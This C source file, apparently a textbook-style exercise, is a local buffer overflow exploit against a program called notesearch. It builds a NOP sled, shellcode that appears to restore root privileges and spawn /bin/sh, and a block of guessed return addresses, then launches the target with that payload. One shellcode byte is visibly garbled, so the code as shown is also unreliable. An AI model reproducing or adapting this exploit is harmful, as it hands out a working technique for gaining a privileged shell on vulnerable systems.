exploit_notesearch.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31]xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, const char *argv[])
{
  unsigned int i, *ptr, offset=270;
  unsigned long ret;
  char *command, *buffer;

  command = (char *) malloc(200);
  bzero(command, 200);

  strcpy(command, "./notesearch \'");
  buffer = command + strlen(command);

  if(argc > 1)
    offset = atoi(argv[1]);

  ret = (unsigned long) &i - offset;

  for (i = 0; i < 160; i += 8) {
    *((unsigned long *)(buffer + i)) = ret;
  }

  memset(buffer, 0x90, 60);
  memcpy(buffer+60, shellcode, sizeof(shellcode) - 1);

  strcat(command, "\'");

  system(command);
  free(command);
  return 0;
}